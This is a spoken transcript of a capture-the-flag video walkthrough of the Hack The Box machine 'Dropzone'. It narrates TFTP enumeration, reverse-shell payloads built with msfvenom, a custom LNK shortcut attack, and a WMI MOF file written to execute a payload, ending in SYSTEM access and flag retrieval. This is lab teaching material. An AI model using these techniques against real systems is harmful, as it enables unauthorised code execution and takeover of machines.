Hey everyone, welcome back to another edition of Can You Hack It? This week we're back on Hackthebox.eu taking a look at another Windows system, this one called Dropzone. So if you take a look here, we can see the IP address is 10.10.10.90, so why don't we just go ahead and get started. So if we do Nmap, and we'll do -T5 to make the timing aggressive, and SC and SV to enumerate scripts and versions, -V to get verbose output so we can see it while it is running, and then OA to output all formats, and we'll write that to nmap/quick, and then finally the IP address of the box, which was 10.10.10.90. And so we will let this run. And actually, what we'll do is pop open another tab here real quick, because what we're going to see is that there are no TCP ports listening. So what we need to do now is scan UDP ports. And so if we just do nmap, make timing aggressive again if we want, and then SU, I believe, for UDP ports, we can output that to all formats and write it to nmap/UDP. And then 10.10.10.90. And so that seemed to be one of the things that a lot of people got caught up on, is they ran this TCP scan, it finished, they didn't find anything. So they did a complete port scan of all TCP ports. Again, didn't find anything. They assumed it was a firewall issue, tried firewall evasion techniques, things like that, and it still didn't get anywhere. And so that was the reason why. So as you can see, the normal 1000 port scan finished, nothing was found. See if the UDP scan has gotten anywhere. It still hasn't. Let's actually throw the -V flag in there to make it verbose so we can see it while it is running, because what we're going to find out is that there is only one port available on this system. And there it is, port 69. So those that aren't familiar, port 69 is TFTP. It's a file transfer service. Unlike FTP, it doesn't allow any sort of directory listing, so we can't just connect to it and see what files are available. So that makes it a little bit harder to enumerate. We have to actually specifically ask for files and wait for it to reply back and say it has it or it doesn't have it. So let's pop open the TFTP client, and then we can try and see if we can tell what directory this TFTP server is serving out of. And usually you can do that by doing a get 10.10.10.90 : and then a file that you want. So we'll just say we want please subscribe. Hit enter, and you'll notice that it says it could not get the file C:/please subscribe. So since it's a Windows box, C:/ is probably the root of the Windows directory or the system drive. And so what we can try and do now then is see if we can figure out a little more information about this box, what OS it's running, things like that. So on a Windows box, we should be able to pull the EULA, the end user license agreement, which is kept in Windows System 32 EULA.txt, I believe. I actually should have given it an output name because it's going to write it, I think, to the whole path, which is kind of goofy. So that finished. Let's open up another, actually we can use this tab. And see, so we see EULA.txt there. Let me move all these other Nmap things. For some reason I went in the wrong spot. Nmap. And we'll move the other ones too. Okay. So, please subscribe is just the file that we attempted to get but wasn't there, so we see it's 0 KB or 0 bytes. So if we remove it. And now if we cat EULA.txt, we can see at the bottom here that the EULA ID is XP Service Pack 3 RTM Pro. So that tells us that it is the XP Service Pack 3 RTM, which I believe is 2600. So that gets us a little bit of information on the system. We still don't technically know if it's 32 or 64-bit, which they did have both versions for XP Service Pack 3. So that would probably be the next thing we would want to figure out. And so how we would go about that is by pulling the NTOS kernel file. Again, we're just trying to figure out how we can do things using stuff that we know exists. If you didn't know that this stuff exists because you weren't really familiar with Windows, you could probably Google around a bit to try and find it. So that should be also in System32. So we do get 10.10.10.90 Windows System 32 NTO LSK RNL, I think, .exe. Yeah, and so if it wasn't there, it would have given us an error right away. It's transferring. This one's actually going to take a while probably because it's fairly large and TFTP is fairly slow. We can verify it's actually working by pulling up Wireshark here real quick, and you can see UDP traffic going back and forth, and it's happening over our TFTP port. So this is going to take a while for it to complete. We can go ahead and close out of Wireshark now since we're not super interested in watching it there. And so while we're waiting for that to finish, we can actually pop open a web browser real quick and see which TFTP servers we're likely to encounter on Windows. There's really only two. There's one by SolarWinds and there's TFTP 32, I think, or TFTP D32, which is this one. This is the one that you would most often see, or it's the one that at least I most commonly see used. This one is just a single executable. It can be placed anywhere, so it may be hard for us to verify that it is indeed the one on this particular system. If it is the SolarWinds one, then it should be in the SolarWinds directory. I can actually show you another way that we can see if we can figure out which one it is. It's not super relevant since there aren't a lot of known vulnerabilities for these TFTP servers, at least that I'm aware of, but that is a potential avenue of attack, especially since we only have this one port open. So it looks like there is one in TFTP server 1.4, which I don't know which particular TFTP server that is. Looks like there's actually a couple in that one. There's a buffer overflow in TFTP D32, versions 2.21 and prior. So again, once we identify which one we're working with, we may be able to take advantage of it. So that's finished transferring. You can see it actually took a long time, 426 seconds. So back over here, we can actually take a look and see some information from that file using a tool called EXIF tool. It's not on Kali by default, I don't think. You can install it by doing an apt-get EXIF tool. And so if we do EXIF tool, ntos kernel.exe, and all we get is the size and the modification information. So we actually have an issue with our transfer here. The reason I did it this way, even though it killed some time, is I wanted to show a second problem that I saw really common on this box, was that people were using the wrong transfer mode. So just like FTP, there's two transfer modes, and it defaults to using ASCII-based one. And so when you're transferring executables like this using the ASCII-based method, it actually corrupts the file. And so what I'll do is transfer it again using binary this time, mode binary, and this time we should be able to get the file without it being corrupt. So if I just copy this line, paste it, and we wait again. Luckily for you, the wait should only be a couple seconds. So that one's done, also in 426.8 seconds. So now if we run this tool again, we notice that we get a lot more info. So we can see that it's a 32-bit executable, which means that we're running on 32-bit Windows. We can also see the file number version, which we could correspond back to the specific version of Windows XP. You can see 2600 in the file name here, which is what I was expecting to see for Service Pack 3 RTM. And let's see if we see anything else that's notable in here. I don't think so. And so the next thing that we may want to try and find is something that gets us a little bit more info about how the system's set up, what applications they're using, something that we can use to try and find a way in. So for those that are familiar with Windows, they use the registry for a ton of stuff, and the registry is actually just a handful of files on the file system. Unfortunately, a lot of those files are locked anytime Windows is running, and we can't actually get access to them. There is one file, however, that we should be able to get access to, which is the ntuser.dat file, which resides in each user's directory. Now, unfortunately, we don't know the name of the users on this system, and I can't think of a good way that we could enumerate them. But we do know that there's an administrator on here, and so we can see if we can grab the administrator's ntuser.dat file at least. And to do that, we would just do get 10.10.10.90. Again, we want to make sure we're in binary mode, which we are since we haven't closed out. Let's see, this is Windows XP, so it's actually not users, it's documents and settings, which you'll notice has a space in it. I don't know if we can use quotes and spaces in the TFTP tool, but what we can do is use short names. And so if we just use the first 6 letters, so DOC, UME, and then a tilde and a 1, and that 1 could be incremented to 2, 3, 4, 5, 6, depending on how many directories have names that match those first 6 characters. And then /administrator/ntuser.dat. So now that's pulling down. And as soon as we're finished pulling it down, what we're going to do to look at it is actually use a Windows VM. And the reason for that is A, I don't know of any great tools for viewing this type of stuff in Linux. And B, I just always like to kind of mix up, throw in a VM that we can use stuff in, get a little more visibility, because we'll end up using this VM also in this video for testing out how we're going to actually get access to the system. And so we'll use the native registry viewer in order to view this file once it's finished downloading, of course. And boom, just like that, it is finished downloading after 151 seconds. For those that may not be aware, since I've been just editing this video up to remove the spaces, this video so far feels like it's actually taken like 45 minutes, but to you, it's been probably about 10 to 15. Lucky you. And so there we go. We've got the ntuser.dat file over here in our Windows XP VM, which I'm sure you recognize from this awesome background and the old style start button. So we go to run, regedit, and let's see, under HKey current user, we should be able to import, or no, sorry, HKey users I think is where we can import. Import, desktop, all files, ntuser.dat. Yeah, apparently I tried to put it in the wrong spot. Let's try here. Okay. And so now if we look, actually let me take a look real quick. I'm not sure that I put that in the right spot, though it didn't ask me to put it anywhere else. This will be restored on top of. Okay, so actually, it's a good thing this is a VM. You wouldn't want to do that in your own machine, but basically I just blew away the HKey current users and substituted it with the one from the box. So if we take a look on here, we can actually see that there's some keys for SolarWinds. And so that means that it's likely that we're using the SolarWinds TFTP server on there. We can also look under Software Microsoft Windows Shell for shellbags and MRUs, which actually this still doesn't look super updated, although maybe they didn't do a lot on here. So normally this would show most recently used stuff, would show things that had been viewed in Explorer. I don't see a whole ton in there, although actually I do see a lot more over here. But likely digging around in this isn't going to do us a whole lot of good other than possibly finding some more stuff that we can look at. But for now, we do have one thing that we can look at, which is seeing which version of the TFTP server they're using. And so on this machine that I have here, I actually have SolarWinds TFTP server pre-installed just so that you guys don't have to waste time watching me install it. And so we can go look and see where it installs to. And so we can see it in program files, SolarWinds TFTP server. The executable is here. You can see on my machine it is version 10.9.1.3. So back on our Kali VM, we can try and pull that executable and take a look at it and see which version it is. So we should be able to do that by doing get 10.10.10.90 colon program files SolarWinds TFTP server and TFTP server.exe. And so that is down now, so we can take a look at it back over here with EXIF tool, TFTP server. So this one got a funky name. So if we mv TFTP server.exe. And so we can see that this is version 10.9.1.33. And if we look back here, I think that's the same version that we're running, which actually is just a coincidence. I downloaded the latest version, and that must be what it is. So that also lets us know that there's probably not going to likely be an exploit available against it, but we can look anyway. SolarWinds TFTP exploit. So that's quite an older version. That one's a denial of service, but it's also an older version. List of vulnerabilities. Most of these seem to target older versions than what we have, so again, makes me think that that's not going to likely be a way in. So now if we were to try and see, we could figure out maybe what users are on the account, see if maybe we can read the user flag without actually getting access to the box just by pulling it through the TFTP server. That's something we could possibly try and do. We can make it a little bit easier by using short names, which if you're not familiar with them in Windows, for compatibility reasons, everything has a short name. And so short names, I think, are limited to 8 characters, but 6 characters are of the name, then a tilde, then an index. And so basically, like if we were to switch to our C drive here and do a dir/x, you can see the short name for both program files and documents and settings. And so that allows us to enumerate accounts a little bit easier through this TFTP server by doing something like, say, we'll enumerate the 2 other accounts on this test VM that I have set up. Now this would be a process where you would want to have some sort of a tool that just made request after request after request and incremented some field. I'll do it manually just to show you what would happen. So if you did a get 192.168.1.179 document and settings, and then Benja with an M, and then tilde1, and then just request something that's not there, X. And it'll say it can't find the file. See documents and settings, Benjamin 11223344. So now we know that this is one account just by using the first 6 digits of the account. And so we can actually repeat that, but this time increment this to 2. And we can see Benjamming is another account on here. Now, I don't know, it seemed like some of the people on the forums may have indicated that they tried brute forcing these. I don't think it's worth the time. TFTP is so slow that you're probably going to end up getting maybe 10 requests a second or something, and it would just take forever to look for anything. So we're not going to go down that route. Although there are some tools out there for brute forcing TFTP, you can feed them word lists, you can do some other stuff like that to try and accelerate it instead of just brute forcing every possible combination. But again, I don't think it's worth it on this box because it simply takes too long, and on most of the Hack the Box boxes, anything that takes a ridiculous amount of time is probably not the correct way to do it. If you can't do it in a couple minutes, it's probably the wrong way of going about it. But I won't lie, I did try and brute force, I think, just the common 100 usernames or something like that, just to see what happened. And of course, there was nothing there. So this really limits down our possibilities for getting access to the system. A common question people had on the forums was how people that finished this box knew what to look for. And without ruining it yet, the only answer I can give that's generic enough is that when you start having a lot of restrictions on what you can do, like on this particular box where you just have TFTP facing you and nothing else that we can see anyway, you got to think of things that you could make work given the restrictions. And if you happen to pay attention a lot to different security news, vulnerability findings, things like that, you may start getting some ideas on things that might work. In this case, there's a couple things we can look at. One is a vulnerability in how link files or shortcuts are handled in Windows. Basically what it is you can create a shortcut and point it to something like a DLL. And when that shortcut is shown, it will attempt to get an icon from there, and in doing so will actually execute the code in the DLL's main. You can do this with CPL files also, which are control panel files, which are really just DLLs under the covers with some special exports. And so basically, that is a way that you can place a file and get execution without the user directly interacting with it. In the case of link files, they're kind of interacting with it still because they've got to look at the directory that the file is sitting in order to get something to happen. This was used in Stuxnet, which was the, let's see if I can say it without getting political, the virus that was written in order to sabotage Iran's centrifuges for enriching uranium, I believe. I'm not actually up on the details of that, but anyways. And so basically, the way this worked was you inserted a USB drive. There was a set of link files for different versions of Windows on said USB drive. Those files would cause it to execute the payload that was inside of a DLL, which was renamed to some temp file, because in this particular case, it doesn't matter what the name of the file is. And then the code in there executed. And so basically, we can try and use that. The only potential downside is going to be if nobody's looking at the directory that we're trying to put stuff in. And so what we can do to try and get around that is there are some common directories that we should be able to use. Again, this kind of requires a familiarity with Windows, but in the Documents and Settings folder, there's an All Users folder. And in that All Users folder, there's a desktop folder. And anything that you place in there should appear on the desktop of any user on the system. And so what we can do is we can see if we can actually build a payload stick it somewhere on the system. We'll put it in like Windows temp, and then create this link file, stick it in the all users folder, and see if it works. We'll test it out on our local VM first so that you can see what happens. And if that succeeds, we'll go ahead and try it out on the real box. So for creating our payload, we'll just use MSF Venom. And so what we'll want to do is run that with a payload of Windows interpreter reverse TCP. We'll set our L host equal to our local IP address for right now. And we'll set our L port to 4444, format to DLL, and we'll output that to payload local.dll. And the next thing we need is a tool to build a link file. Technically, we could actually, on our Windows box, I think, just right-click the file, drag it, drop it somewhere, and it would execute, but we want to do it back through the TFTP server just so that we're doing it the same way we're going to be doing it on the real box. I think there's actually a tool for making these link files already in Linux. I think if you use search exploit, okay. Yeah, I think some of these are for creating it. In this particular case, for this box, I ended up doing a bunch of research on how LNK files are formatted, the binary format of them. They're actually called shell links. Just because I wanted to understand more about it. And so I actually have a tool, which I think I can find, to make one. But feel free, you could use the ones that are included with Kali, and they should work just fine. So if we go to gists, search for file name, it's lnkbuilder.py. Yeah. So if we just take the raw version of this, basically what it's doing is it's just building the various fields in this file. There's a class ID that's used that has to be set to this. There's some flags which we preset. Access times we just set to 0. A lot of this stuff I just set to 0. And then there are the class IDs for my computer and for control panel, which we'll use. And then the final item is going to be the path to our executable. So the path to our executable, we convert, we shove all this stuff together into a file, and we output it to output.lnk. So if I just copy that, vim lnkbuilder.py, make it executable, and then do python lnkbuilder.py, actually Python 3, and then the name of, or the path to the executable, and so that was payload local.dll. We'll put it in Windows temp. So that would be c://windows temp payload local.dll. And those were just some debug printouts that show different parts of it. We should have the file in here now called output.lnk. We do. So we've got our output.lnk and we've got our payload local.dll. So if we switch back over here real quick, everything looks fine. Let's start up a Metasploit handler to handle our payloads callback. So if we do use exploit multi-handler, show options, set our payload to Windows interpreter reverse TCP. We should just have to set our L host and set L host to 192.168.1.177, and our L port should be fine at 4444. So we can set exit on session to false, and then exploit -j. And why did I get, oh, there's an old box that I had done a video on just before this one, and I hadn't actually killed that yet. So let's clean this up a little bit. So I requested a reset on bounty. That should kill off those other ones. I actually noticed that my IP address isn't 177, it's 173, so we've got to fix that real quick in our payload. So we'll bounce over here, and we'll change this to 173. And then in here, we will see what jobs we have running. Kill off, or sorry, we'll do jobs K0. Show options. We'll set lhost to the correct address. And then we'll try this again. We may get a connection again from that other system, since I haven't actually, or since the restart probably hasn't happened yet. Oh, I forgot exploit-j, so it's hanging waiting for it, which is fine. So on our TFTP server, if we do a put, and we'll put payload local.dll to 192.168.1.179, Windows temp, payload local.dll. So that's been sent. And then if we put output.lnk to 192.168.1.179, and we'll want to stick this in that all users directory, so that'll be documents and settings, all users, desktop, output.lnk. Oh, I think because of the fact that there's a space in all users, we've got to use the short version of that too. So we'll do this instead, which allows us to not put that space in there. Desktop output.lnk. So that's been sent. Our handler's still waiting. We can see output.lnk is on our desktop. We didn't get a reverse shell though. So let's take a look real quick and see. Oh, I think our shortcut's invalid. Something went wrong with the generation of it. So let's try and generate that again. It's possible that we just need to that. And then we'll send it again. Still not a valid shortcut. So actually I took a quick look, paused the video and took a quick look. This particular line that I'm highlighted on right now was missing in the version that I had posted on GitHub. I had fixed it locally, I had forgot to update it. So that was why that wasn't working. It should work now, although I haven't actually tested it yet, so we'll see. So if we create our output.lnk file again, and we send it up, and we look back over here, still saying it's not a valid shortcut. it's possible. Oh, you know what it probably is? Let's try this. I think it caches them. So if we rename it to something other than output.lnk instead, just call it b.lnk. Still not a valid shortcut. So apparently I'm having technical difficulties today, which in a way is good because it allows you to see what happens when things don't go right. Vim link builder. Okay, and so basically I just generated it again. This time it looked right. For some reason this previous execution of it didn't have all the padding that I would have expected to see. So generated it again using the same file that is available on GitHub now. And this time if we take a look we can see that we actually got a shell back. So we do sessions-l. We can see session 3, which is at my VM here. Do sessions I3 shell. Who am I? Oh, that's right. Windows XP doesn't have who am I. Anyway, we can see that we have access to the system now. And so what we can try now is changing this up to be able to use it remotely. Or sorry, on the real system and see what happens. Make sure our job is still listening. It's not, so do exploit-j. Oh, let's actually kill that job. It's listening on the wrong port. So if we set lhost to 10.10.14.6, now do an exploit-j. So now we've got our handler listening. And our payload needs to be regenerated. Again for 10.10.14.6. And we'll just call this one payload.dll. Which means our output file will also need to be regenerated now. To just use payload.dll. So now we should be ready to do it on the real box. So we do put payload DLL to 10.10.10.90 Windows temp payload.dll, and then put output.lnk to 10.10.10.90 colon documents and settings, all users, desktop output.lnk, and then see if we got a shell back. Doesn't look like we did, so it's likely that there's nobody logged into the box. If nobody's logged into the box, as far as I know, there's no way to get this to actually work. So then that basically leaves us one other method that I can think of. Let's clear this window so it's a little cleaner. And that is using another exploit that was found in Stuxnet first. And this one has to do with an abuse of the way that WMI handles MOF files, which is a managed object format file. Basically, they have a web-based enterprise management folder, and you can put these MOF files in there, and they're used to extend WMI or to create your own WMI stuff. And basically, this technique will allow you to write a file to a specific folder, and if it's correctly formatted, it'll be parsed, and then once it's parsed, it will execute when some sort of condition is met. And so what we can do is make our own file that runs a script when our file is parsed, basically. And so I think we can probably find something out on the web that's good enough to look at. MOF Windows exploit. And so like here it shows that basically you need to be able to write to Win32 WBEM. Actually, there's an MOF folder inside of there, I believe. And it looks like there may be some Metasploit stuff. To create an MOF file, we'll just do it manually instead since it's not super complicated. And then we can test it on our local machine, this VM over here, this one, and see if it works. And then once we have it working, we can try it on the real machine. First, on this machine, though, we're going to have to kill explorer.exe because our link exploit has caused it to lock up, which is pretty common. So if we kill Explorer, and we'll have to relaunch it probably. And actually I think we're gonna lock up again. I should have put it in a folder on the desktop instead. Let's do this. Let's kill Explorer. New task of command.exe. Let's delete it off the desktop. And, oops, delete output.lnk. So now it should be gone. Now we should be safe to run Explorer again. And life is back to being happy. So let's go back to our Kali machine. Let's pop open Sublime Text. Let's open a new tab here. You can look all of this up. There's probably a billion examples of it already. We're going to define pragma, namespace. I think it's 4 backslashes dot / root / subscription class, and we just give it some name. Please subscribe. And then we'll create a key, string name. And we're going to make an instance of event filter as filter. And then in here we'll have name is equal to class name. Query is equal to select star from instance creation event where target instance dot class is equal to, we have to escape these quotes, is equal to please subscribe. And query language is equal to WQL. And we will close that off. And we'll create an instance of active script event consumer as consumer. Name is equal to class name. Scripting engine is equal to VB script. And then script, script string script text is equal to set obj shell is equal to create object w script.shell shell.run Windows temp payload.exe and so that should be good. And then an instance of filter to consumer binding as bind. How did I mistype that? Consumer binding. And consumer is equal to $consumer. Filter is equal to $filter. And then finally, instance of please subscribe as my class, whatever we want to call it. Name is equal to please subscribe. So this should be everything we need. So we can save this as dropper.mof. And then what we can actually do is just try it out manually first on our Windows VM. We could do it through TFTP, but likely TFTP isn't going to be the limiting factor. Let's see. So we'll need to kill off our listener again. Or actually, I think we can just start another listener. Set lhost 192.168.1.173. Exploit-j. Jobs L. So yeah, now we've got a listener listening on both. We need to make our payload.exe, which is essentially the same as we did with our DLL, but outputting to a executable instead. Actually, I suppose we'll just call it payload local. And we can rename it when we copy it through TFTP. So if we do put payload local.exe 192.168.1.179 colon Windows temp payload.exe. So now that that's up there, we just need to put our MOF file. I'll show you first where they go. So it goes Windows, System32, WBEM, MOF, and you'll actually see there's two folders in here, one called good and one called bad. And so basically ones that parse correctly are going to go into bad, or good, ones that parse incorrectly are going to go into bad. And then it will disappear from here, which is actually a way that we'll be able to tell if it's been parsed on the remote system. Is once we place it on the remote system, if we just try and pull it after that and it says it failed, then we know it was parsed. We should be able to pull it from good or bad after that if we wanted to see. That would be a way of doing this box without a VM. You'd be able to achieve the same thing. It's just a little more clunky. I like to do it over here in the VM. Once I have it working good here, it usually goes just fine over there. So if we do put dropper.mof to 192.168.1.179 colon Windows System 32 WBEM MOF dropper.mof. And then we switch over to our Windows XP machine. We see that it's not in here already, and it's apparently in bad, not good. So we can take a look in logs under MOF comp. And this actually will show us the compilation, and we can see here that we had an expected semicolon or equals on line 8. So if we take a look back at line 8, so it's something wrong with this. Now it's not completely accurate when it says line 8. It could be anything inside of here. So if we take a look, name, class name, select from instance creation event, where target instance is equal to query language is WQL. Let's see, that's a typo. Active script event consumer. Oh, there's a typo right there. This should be script text, not stripped text. Script text. Let's save that and see if that was the problem. So if we repeat that, look back at here, looks like it still has a problem with our MOF file. If we go in here, let's just open this in a new directory. Actually, yeah, so we failed to parse again. So we'll look back again real quick, see if we can spot the mistake in here. So we've got string name, that all looks good. Please subscribe. Oh. Missing the semicolon on there. So now if we drop it again, and then we take a look back at our log file. Looks like we have an error on line 32 now. No, I did not intend to have this many errors. I actually did intentionally put the stripped error just so that I could show how you would debug it, but apparently I didn't need to because I left plenty of spots with errors on accident. So hopefully that is our last one, since that's the last line of the file. And if we take a look back here again, and it looks like it finished compiling it, and it's showing up under good, so we should have a session, and we do. So session 4 has been opened from the IP address of our VM. So let's go ahead and modify our payloads a little bit and see if we can get the real machine to call us back. So let's generate our payload again. This one we'll just call payload.exe, and we'll set it to the right IP address, 10.10.14.6. And the rest of our stuff should be good to go already. Our dropper should work. So let's put payload.exe in 10.10.10.90 Windows temp payload.exe. And then let's put our dropper into 10.10.10.90 Windows System 32 WBEM MOF dropper.mof. So that's sent, and let's see, we got a callback, and we did. So from 10.10.10.90. So now if we do sessions interact with 5, and we should be able to do a shell. Who am I? That's right, this is XP. So we should be able to just drop back and do a get UID. And so you can see that we're actually running as system already. So at this point, we should be able to drop back into our shell, change to our Windows directory, documents and settings, administrator, desktop. And it looks like we lost our shell. This is a common thing I saw in this box. For some reason, this shell drops a lot. We can actually just change directories in here instead. Desktop. We can do a dir. We can see a flags directory and root.txt. I think ls should work on here too. So we do a cat root.txt. We get the message, it's easy, but not that easy. And so if we cd to flags, an ls in here. Oh, somebody left a tool for us that I was actually going to download, so I suppose that's helpful. We see 2 for the price of 1, exclamation mark.txt. Because this is Windows XP, well, first let's do this. Cat 2 for the price of 1. Get a little ahead of myself there. It says for limited time only, keep an eye on our ADS for new offers and discounts. And so I think they're playing on ADS, ads. But ADS can also be in alternate data streams. And basically in Windows, that's a way of appending information to the end of a file, kind of attaching a file to a file. Now, in newer versions of Windows, the dir command can show those. In older versions like Windows XP, it can't. And I don't know of a way to do it natively with the Meterpreter. But what I would normally do is download a tool by Mark Rusinovich, a system internals tool called streams.exe. And streams.exe allows you to see streams that are attached to files. And so since somebody already put it here, it'll save me the trouble of downloading it. But basically, we would have just gone and Googled streams.exe, went to the sysinternals site, and we would have been able to download it from here. And so basically we can tell it to recurse a subdirectory, we can tell it to delete streams. On this particular box, I'm trying to debate right now if I should use it or not, because it's actually going to show us the flags, because the flags aren't in the streams, they are the name of the streams. I suppose I can probably edit it out in the video afterwards. So if we just do streams.exe, we drop into a shell, streams.exe, streams.exe2 for the, well, let's do it this way. We lost our shell again. Shell, streams2 for th1.txt. And there's the 2 flags, root flag and the user flag. And that's all there was to this box. This was actually one of my favorite boxes because of the fact that we had such limited entry point. In some ways that helped focus if you knew what to look for. For other people, it was just a big dead end. But hopefully at least you enjoyed the video and it taught you something new if you didn't already know some of this stuff. So feel free to leave a comment, like the video, subscribe to the channel, hit me up on Twitter or Hackthebox. Keep in mind, if you hit me up on Hackthebox, that sometimes I'm off of there for quite a while due to being busy with work and stuff, and so it may take me a while to get back to you. If it does, sorry, but just be aware of that. Anyway, I hope you all have a great weekend, and I'll see you on the next video.